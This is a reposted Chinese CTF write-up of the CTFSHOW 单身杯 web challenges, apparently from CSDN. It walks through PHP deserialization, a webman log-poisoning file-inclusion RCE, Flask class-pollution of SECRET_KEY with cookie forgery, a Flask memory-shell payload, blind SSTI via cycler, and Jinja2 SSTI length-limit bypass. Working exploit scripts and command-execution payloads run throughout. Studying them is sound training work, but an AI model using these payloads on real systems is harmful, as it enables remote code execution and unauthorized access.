前言
昨天刚结束的CTFSHOW单身杯,遗憾没有时间打,只能做个赛后复盘了。我主攻WEB方向,所以对WEB方向的题目进行一次复现,其他方向有兴趣了解的朋友可以参考官方WP,链接我会放在参考部分。
1. 签到·好玩的PHP
打开环境,访问地址即可看到题目源码
<?php
error_reporting(0);
highlight_file(__FILE__);
class ctfshow {
private $d = '';
private $s = '';
private $b = '';
private $ctf = '';
public function __destruct() {
$this->d = (string)$this->d;
$this->s = (string)$this->s;
$this->b = (string)$this->b;
if (($this->d != $this->s) && ($this->d != $this->b) && ($this->s != $this->b)) {
$dsb = $this->d.$this->s.$this->b;
if ((strlen($dsb) <= 3) && (strlen($this->ctf) <= 3)) {
if (($dsb !== $this->ctf) && ($this->ctf !== $dsb)) {
if (md5($dsb) === md5($this->ctf)) {
echo file_get_contents("/flag.txt");
}
}
}
}
}
}
unserialize($_GET["dsbctf"]);
1.1 代码逻辑
- 变量$dsb由$d,$s,$b三个变量拼接而成,要求这三个变量的值两两不等,拼接得到的字符串长度不超过3。
- 变量$ctf长度不超过3。
- 如果$ctf和$dsb不强等于,而MD5值相等,那么包含"/flag.txt"。
- 传入参数dsbctf是序列化后的字符串,通过unserialize函数反序列化后调用__destruct方法实例化ctfshow类,触发发序列化漏洞
强等于"==="需要变量类型和变量值都相等,一个思路使用PHP中的特殊浮点常量NAN和INF。
1.2 什么是NAN和INF?
在PHP中,NAN是一个特殊的浮点数值,表示非数值(Not-A-Number)。当一个运算无法计算结果时,比如零除以零,就会产生NAN。
PHP中的INF是一个特殊的浮点数值,表示无穷大(Infinity)。当数值超过PHP_FLOAT_MAX或者使用一些数学函数产生极大或极小的结果时,就会得到INF。
1.3 利用思路
1.3.1 php浮点数常量NAN和INF
使用浮点常量INF分别给ctf和dsb变量赋值,长度都为3,dsb是字符串类型,ctf是浮点型,由于MD5是以字符串形式进行加密的,所以他们的MD5值是相等的。这样就达到了绕过的目的。
payload:
<?php
class ctfshow {
private $d = 'I';
private $s = 'N';
private $b = 'F';
private $ctf = INF;
}
$a=new ctfshow();
echo urlencode(serialize($a));
//O%3A7%3A%22ctfshow%22%3A4%3A%7Bs%3A10%3A%22%00ctfshow%00d%22%3Bs%3A1%3A%22I%22%3Bs%3A10%3A%22%00ctfshow%00s%22%3Bs%3A1%3A%22N%22%3Bs%3A10%3A%22%00ctfshow%00b%22%3Bs%3A1%3A%22F%22%3Bs%3A12%3A%22%00ctfshow%00ctf%22%3Bd%3AINF%3B%7D
2. 迷雾重重
下载题目源码,放到IDEA进行代码审计
看到IndexController.php
<?php
namespace app\controller;
use support\Request;
use support\exception\BusinessException;
class IndexController
{
public function index(Request $request)
{
return view('index/index');
}
public function testUnserialize(Request $request){
if(null !== $request->get('data')){
$data = $request->get('data');
unserialize($data);
}
return "unserialize测试完毕";
}
public function testJson(Request $request){
if(null !== $request->get('data')){
$data = json_decode($request->get('data'),true);
if(null!== $data && $data['name'] == 'guest'){
return view('index/view', $data);
}
}
return "json_decode测试完毕";
}
public function testSession(Request $request){
$session = $request->session();
$session->set('username',"guest");
$data = $session->get('username');
return "session测试完毕 username: ".$data;
}
public function testException(Request $request){
if(null != $request->get('data')){
$data = $request->get('data');
throw new BusinessException("业务异常 ".$data,3000);
}
return "exception测试完毕";
}
}
有四个接口testUnserialize、testJson、testSession、testException
2.1 代码分析
testUnserialize接口没有发现存在触发反序列化漏洞的可实例化类
testJson接受json格式数据,如果'name'的值等于'guest'的话就调用view方法,传入的参数为一个字符串'index/view'和我们传入的json格式数据$data,进行跟进
调用到 render方法,具体实现如下
public static function render(string $template, array $vars, string $app = null, string $plugin = null): string
{
$request = request();
$plugin = $plugin === null ? ($request->plugin ?? '') : $plugin;
$configPrefix = $plugin ? "plugin.$plugin." : '';
$viewSuffix = config("{$configPrefix}view.options.view_suffix", 'html');
$app = $app === null ? ($request->app ?? '') : $app;
$baseViewPath = $plugin ? base_path() . "/plugin/$plugin/app" : app_path();
$__template_path__ = $app === '' ? "$baseViewPath/view/$template.$viewSuffix" : "$baseViewPath/$app/view/$template.$viewSuffix";
if(isset($request->_view_vars)) {
extract((array)$request->_view_vars);
}
extract($vars);
ob_start();
// Try to include php file.
try {
include $__template_path__;
} catch (Throwable $e) {
ob_end_clean();
throw $e;
}
return ob_get_clean();
}
}
传入的参数$var可控,利用extract()函数可以实现变量覆盖,下面还有一个文件包含漏洞。
2.2 利用思路
要利用文件包含漏洞需要找到可被包含的文件
- nginx apache 不存在,排除日志包含的思路
- pearcmd 由于命令行启动 这里不能使用
php-fpm的方式 包含pearcmd.php来getshell - session 文件包含 需要找到网站部署的目录名字 进行绝对路径包含 相对路径无法定位到
session文件 - 文件上传未开启 无法包含临时文件 和 文件上传
session - 远程文件包含 测试发现除了file协议 其他伪协议并未开启
一个思路是包含php代码。include的包含方式是先检查一遍所要包含的文件是否存在,如果存在则包含,不存在则报错。如果包含的是php代码,include会先执行一遍php代码,再将未经url编码的报错信息写入日志文件。我们可以包含执行命令的php代码,如'<? `cat /flag>flag.txt`;?>',将命令执行结果输出到可访问的文件目录下,如public目录,但是重定向输出执行结果到指定文件需要public目录的绝对路径。获取绝对路径的思路是利用/proc/进程PID/cmdline找到存在start.php的命令,因为cmdline包含了运行start.php时文件的绝对路径。
/proc/pid目录介绍:
官方payload:
import requests
import time
from datetime import datetime
#注意 这里题目地址 应该https换成http
url = "http://6d2d54ba-5db3-454c-b8b4-869e514c1376.challenge.ctf.show/"
#Author: ctfshow h1xa
def get_webroot():
print("[+] Getting webroot...")
webroot = ""
for i in range(1,300):
r = requests.get(url=url+'index/testJson?data={{"name": "guest", "__template_path__": "/proc/{}/cmdline"}}'.format(i))
time.sleep(0.2)
if "start.php" in r.text:
print(f"[\033[31m*\033[0m] Found start.php at /proc/{i}/cmdline")
webroot = r.text.split("start_file=")[1][:-10]
print(f"Found webroot: {webroot}")
break
return webroot
def send_shell(webroot):
#payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`ls%20/>{}/public/ls.txt`;?>"}}'.format(webroot)
payload = 'index/testJson?data={{"name":"guest","__template_path__":"<?php%20`cat%20/s00*>{}/public/flag.txt`;?>"}}'.format(webroot)
r = requests.get(url=url+payload)
time.sleep(1)
if r.status_code == 500:
print("[\033[31m*\033[0m] Shell sent successfully")
else:
print("Failed to send shell")
def include_shell(webroot):
now = datetime.now()
payload = 'index/testJson?data={{"name":"guest","__template_path__":"{}/runtime/logs/webman-{}-{}-{}.log"}}'.format(webroot, now.strftime("%Y"), now.strftime("%m"), now.strftime("%d"))
r = requests.get(url=url+payload)
time.sleep(5)
r = requests.get(url=url+'flag.txt')
if "ctfshow" in r.text:
print("=================FLAG==================\n")
print("\033[32m"+r.text+"\033[0m")
print("=================FLAG==================\n")
print("[\033[31m*\033[0m] Shell included successfully")
else:
print("Failed to include shell")
def exploit():
webroot = get_webroot()
send_shell(webroot)
include_shell(webroot)
if __name__ == '__main__':
exploit()
3. ez_inject
3.1 题目分析
打开题目链接
有一个输入框,一个注册和一个登录
先随便注册一个用户test/test,登录之后看到Secret提示
看一下数据包
很明显是jwt伪造,那么jwt密钥是什么呢?
根据提示可以利用原型连污染区覆盖掉全局变量中的SECRET_KEY的值,接口是/register
import requests
import json
url = "https://37dd227b-d7c6-48e4-a462-435c08715f44.challenge.ctf.show/register"
payload = {
"username": "test",
"password": "test",
"__init__": {"__globals__": {"app": {"config": {"SECRET_KEY": "baozongwi"}}}},
}
r = requests.post(url=url, json=payload)
print(r.text)
接下来用test1用户登录, 再用flask-unsign伪造一个jwt
flask-unsign --sign --cookie "{'is_admin': 1, 'username': 'test1'}" --secret 'baozongwi'
eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0MSJ9.ZzYYAg.hqQmeTq4GCo4yfAofb0pngi0tpA
修改cookie后重新发包
提示接口是/echo,
其实就是一开始的输入框
3.2 利用思路
3.2.1 url_for内存马
flask可以用url_for打内存马,一个测试demo
from flask import Flask, request, render_template_string
app = Flask(__name__)
@app.route('/')
def hello_world(): # put application's code here
person = 'knave'
if request.args.get('name'):
person = request.args.get('name')
template = '<h1>Hi, %s.</h1>' % person
return render_template_string(template)
if __name__ == '__main__':
app.run()
测试payload:
http://127.0.0.1:5000/?name={{url_for.__globals__['__builtins__']['eval']("__import__('os').system('calc')")}}
本题环境不需要使用“{{}}”
url_for["\137\137\147\154\157\142\141\154\163\137\137"] ["\137\137\142\165\151\154\164\151\156\163\137\137"]['eval'] ("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(requ est.args.get(\'cmd\')).read())\")==None else resp)", {'request':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['request'],'app':url_for["\137\137\147\154\157\142\141\154\163\137\137"] ['current_app']})
//url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd','whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})
设置了waf
3.2.2 cycler盲注
官方wp用到的是cycler进行盲注:
什么是cycler?
Cycler 是一个用于创建可组合样式循环的 Python 库。它主要用于数据可视化库(如 Matplotlib)中,以简化样式管理。Cycler 允许用户定义一组样式,并在绘图时循环使用这些样式,从而使图表更加美观和一致。
检测payload:
cycler["__in"+"it__"]["__glo"+"bals__"] ["__bui"+"ltins__"].__import__('builtins').open('/flag').read(1)[0]=='c'
官方payload:
import requests
import concurrent.futures
url = "http://7d26c775-19b5-4001-88e3-fbba32c4e64c.challenge.ctf.show/echo"
strings = "qwertyuiopasdfghjklzxcvbnm{}-12334567890"
target = ""
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"cookie":"user=eyJpc19hZG1pbiI6MSwidXNlcm5hbWUiOiJ0ZXN0In0.ZzC9AQ.hbEoNTSwLImc98ykp0j_EJ_VlnQ"
}
def check_character(i, j, string):
payload = '''
cycler["__in"+"it__"]["__glo"+"bals__"]
["__bui"+"ltins__"].__import__('builtins').open('/flag').read({})[{}]=='{}'
'''.format(j + 1, j, string)
data = {"message": payload}
r = requests.post(url=url, data=data, headers=headers)
return string if r.status_code == 200 and "your answer is True" in r.text else None
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
for i in range(50):
futures = []
for j in range(50):
for string in strings:
futures.append(executor.submit(check_character, i, j, string))
for future in concurrent.futures.as_completed(futures):
result = future.result()
if result:
print(result)
target += result
if result == "}":
print(target)
exit()
4. ezzz_ssti
4.1 漏洞检测
4.2 利用思路
4.2.1 常规payload
url_for:此函数全局空间下存在 eval() 和 os 模块
lipsum:此函数全局空间下存在 eval() 和 os 模块
所以我们可以使用 globals 属性来获取函数当前全局空间下的所有模块、函数及属性
下列 Payload 即通过 globals 属性获取全局空间中的 os 模块,并调用 popen() 函数来执行系统命令;因为 popen 函数返回的结果是个文件对象,因此需要调用 read() 函数来获取执行结果。
payload:
{{url_for.__globals__.os.popen('whoami').read()}}
{{lipsum.__globals__.os.popen('whoami').read()}}
有长度限制
长度检测脚本
import os
import requests
import time
url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
s='s'
headers={
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
for i in range(100):
payload='s'*i
res=requests.get(url=url+payload,headers=headers)
print(i)
if res.status_code==200 and "太长了bro" in res.text:
print(len)
print("url={}".format(url)+"\n"+"最大长度:{}".format(len(payload)-1))
break
4.2.2 set+update方法绕过长度限制
最大长度40,可以使用jinja2中的set+update方法来分段保存payload,使用方法如下
{%set x=config.update(a=config.update)%} //此时字典中a的值被更新为config全局对象中的update方法
{%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__
{%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os
{%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen
{{config.p("cat /f*").read()}}
{%print(config)%} //输出config字典的所有键值对
{%print(config.o)%} //输出
利用脚本:
import os
import requests
import time
url='http://83ddceb9-5ff3-4177-b538-4b5a5ef813e8.challenge.ctf.show/?user='
headers={
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
# {%set x=config.update(a=config.update)%} //此时字典中a的值被更新为config全局对象中的update方法
# {%set x=config.a(f=lipsum.__globals__)%} //f的值被更新为lipsum.__globals__
# {%set x=config.a(o=config.f.os)%} //o的值被更新为lipsum.__globals__.os
# {%set x=config.a(p=config.o.popen)%} //p的值被更新为lipsum.__globals__.os.popen
# {{config.p("cat /f*").read()}}
#
#
# {%print(config)%} //输出config字典的所有键值对
# {%print(config.o)%} //输出
payload={'{%set x=config.update(a=config.update)%}','{%set x=config.a(f=lipsum.__globals__)%}','{%set x=config.a(o=config.f.os)%}','{%set x=config.a(p=config.o.popen)%}','{{config.p("cat /f*").read()}}'}
print(len(payload))
for s in payload:
res=requests.get(url=url+s,headers=headers)
try:
if res.status_code==200 and "ctfshow" in res.text:
print(res.text)
break
time.sleep(1)
except:
print("Erro: "+"\n"+res.text)
#check
# req=requests.get(url+"{%print(config.o)%}",headers=headers)
# if req.status_code==200:
# print(req.text+"\n"+len(req.text))
5. 简单的文件上传
5.1 漏洞检测
随便上传一个jar文件
文件大小有限制
上传一个小一点的
下方输入文件名然后Execute,发现有执行回显
上传Runtime的getshell包,发现没有执行权限
这样的报错是因为java -jar
命令前面加了
-Djava.securityManager
参数,
policy
文件内容未知,
jvm
对
uploads
目录有读权限,同时有
loadLibrary.*
权限
测试发现题目并未对上传的文件内容做检测
5.2 利用思路
写一个包含eval方法的本地so格式的libary,通过修改文件后缀进行上传,写一个外部的jar包,通过加载so文件并调用so文件中的eval方法进行命令执行
5.2.1 创建本地so文件
so文件:
https://ctfshow-1257200238.cos.ap-shanghai.myqcloud.com/static/file/dsbctf/CTFshowCodeManager.jar
当然也可以自己写,方法也不一定是eval,更多的内容留给各位自行去探索啦!
5.2.1 外部jar包调用本地so文件
IDEA自己构建一个jar包来加载并利用调用so文件中的eval方法。构建的时候注意jdk版本不要太高,否则可能会执行失败,我用的jdk是1.8
在项目的out目录下找到jar包并上传执行
6. 参考
官方wp:https://ctf-show.feishu.cn/docx/R6udd58bxoQGQMxFphncZq8rn5e
深度剖析Linux进程的内部机制:一探/proc/pid的奥秘_mountinfo 解析-CSDN博客
Cycler 开源项目教程-CSDN博客
python内存马学习_flask内存马-CSDN博客
Flask框架中的页面跳转和重定向(url_for,redirect)_flask redirect-CSDN博客
利用pearcmd.php文件包含拿shell(LFI)_pearcmd文件包含-CSDN博客
Python Flask SSTI 之 长度限制绕过_python绕过长度限制的内置函数-CSDN博客
结语
好久没打CTF了...加油吧!
本文转载自: https://blog.csdn.net/qq_61620566/article/details/143781834
版权归原作者 不用再等 所有, 如有侵权,请联系我们删除。
版权归原作者 不用再等 所有, 如有侵权,请联系我们删除。